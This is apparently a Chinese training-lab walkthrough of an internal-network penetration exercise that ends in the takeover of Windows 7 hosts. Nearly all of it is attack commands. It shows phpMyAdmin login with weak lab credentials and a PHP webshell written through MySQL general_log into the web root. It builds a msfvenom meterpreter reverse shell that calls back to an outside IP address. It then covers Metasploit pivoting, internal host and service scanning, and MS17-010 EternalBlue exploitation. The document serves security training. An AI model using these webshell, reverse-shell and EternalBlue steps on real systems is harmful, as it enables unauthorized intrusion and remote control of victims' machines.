在阿一网络安全学院学习2个月实战内网渗透练习之拿下Win7

http://lab.ayixy.com:88/

http://lab.ayixy.com:88/phpmyadmin

登录：⽤户名root 密码123456

查看存在什么漏洞

查看数据库路径

select @@basedir

查询包含 general 字符串的全局变量名：

查看当前⽇志⽂件：show global variables like '% general %'

开启⽇志记录：

general_log需改为ON

输⼊：set global general_log = "ON"

或在变量处直接修改

更改⽇志⽂件路径：

3 set global general_log_file='C:/phpstudy_pro/WWW/555.php'

往⽇志⽂件⾥写⼊⼀句话⽊⻢

select '<?php @eval($_POST[cmd]);?>'

连接蚁剑：

打开阿⾥云服务器：

使⽤Msfvenom对于Windows进⾏渗透

⽣成⼀个在32位Windows系统可执⾏且带病毒的⽂件：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=218.244.159.113 LPORT=10000 -f exe -

a x86 > 555.exe

⽂件⽣成后：通过蚁剑上传

上传成功后

msfconsole

使⽤Metasploit中的handler模块：

use exploit/multi/handler #使⽤监听模块

set payload windows/meterpreter/reverse_tcp

show options

这⾥使⽤的这个版本默认设置了⼀个payload，但不是我们需要的payload，切换⼀下

看⼀下参数：

其中LHOST、LPORT需要重新设置⼀下

设置好参数就可以跑起来，开始监听了：设置好参数就可以跑起来，开始监听了：

shell 进⼊主机

systeminfo

可以查看⼀些信息

发现有乱码；解决⽅法：meterpreter > shell 中⽂乱码解决办法： chcp 65001

使⽤app-amd64.exe扫描

App-amd64.exe -i 192.168.0.1-10

如果⽤App-amd64.exe -i 192.168.0.2-10则⽆法扫出192.168.0.1

可以看出：

下⾯两个IP主机存在MS17-010永恒之蓝漏洞

10 [+] 192.168.0.10 MS17-010 (Windows 7 Professional 7601 Service Pack 1)

[+] 192.168.0.2 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)

[+] 192.168.0.1 MS17-010 (Windows Server 2003 3790 Service Pack 2)

第⼀次还扫到了192.168.0.1的漏洞

还可以看到端⼝开放情况

结束：exit

添加路由信息

在使⽤msf探测各⽹段主机信息时，我们需要先添加通往各⽹段的路由，这样msf才知道怎么⾛

run post/multi/manage/autoroute

查看路由表

run autoroute -p

存活主机探测

#基于udp协议发现内⽹存活主机（速度太慢）

use auxiliary/scanner/discovery/udp_sweep

————————————————

#基于udp协议发现内⽹存活主机（速度太慢）

use auxiliary/scanner/discovery/udp_probe

————————————————

11 #基于netbios协议发现内⽹存活主机（速度快）

————————————————

#基于tcp进⾏端⼝扫描(1-10000)，如果开放了端⼝，则说明该主机存活（速度太慢）

use auxiliary/scanner/portscan/tcp

端⼝扫描：

#基于tcp进⾏端⼝扫描(1-10000)，速度太慢。单个主机进⾏扫描还⾏，多主机就太慢了

use auxiliary/scanner/portscan/tcp

———————————

#基于tcp的ack回复进⾏端⼝扫描，默认扫描1-10000端⼝

use auxiliary/scanner/portscan/ack

服务器探测

扫描内⽹开放的特定的⼀些服务。建议指定某个或多个主机进⾏扫描，如果同时扫描⼀个⽹段的话

速度太慢

12 use auxiliary/scanner/ftp/ftp_version #发现内⽹ftp服务，基于默认21端⼝

use auxiliary/scanner/ssh/ssh_version #发现内⽹ssh服务，基于默认22端⼝

use auxiliary/scanner/telnet/telnet_version #发现内⽹telnet服务，基于默认23端⼝

use auxiliary/scanner/dns/dns_amp #发现dns服务，基于默认53端⼝

use auxiliary/scanner/http/http_version #发现内⽹http服务，基于默认80端⼝

use auxiliary/scanner/http/title #探测内⽹http服务的标题

use auxiliary/scanner/smb/smb_version #发现内⽹smb服务，基于默认的445端⼝

use auxiliary/scanner/mssql/mssql_schemadump #发现内⽹SQLServer服务,基于默认的1433端⼝

use auxiliary/scanner/oracle/oracle_hashdump #发现内⽹oracle服务,基于默认的1521端⼝

use auxiliary/scanner/mysql/mysql_version #发现内⽹mysql服务，基于默认3306端⼝

use auxiliary/scanner/rdp/rdp_scanner #发现内⽹RDP服务，基于默认3389端⼝

use auxiliary/scanner/redis/redis_server #发现内⽹Redis服务，基于默认6379端⼝

use auxiliary/scanner/db2/db2_version #探测内⽹的db2服务，基于默认的50000端⼝

use auxiliary/scanner/netbios/nbname #探测内⽹主机的netbios名字

利⽤永恒之蓝漏洞攻击其他IP（192.168.0.1）

use exploit/windows/smb/ms17_010_eternalblue

search ms17_010

查看配置

lhost攻击机

rhosts ⽬标机

成功进⼊192.168.0.1

192.168.0.10

同192.168.0.1

需要⽤msf5来操作，msf6会出问题

需在教师，虚拟机⽹络环境⽤桥接环境。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

search ms17_010使⽤0来操作

使⽤正向连接。

可以使⽤⼯具的⽅法操作

nps，frp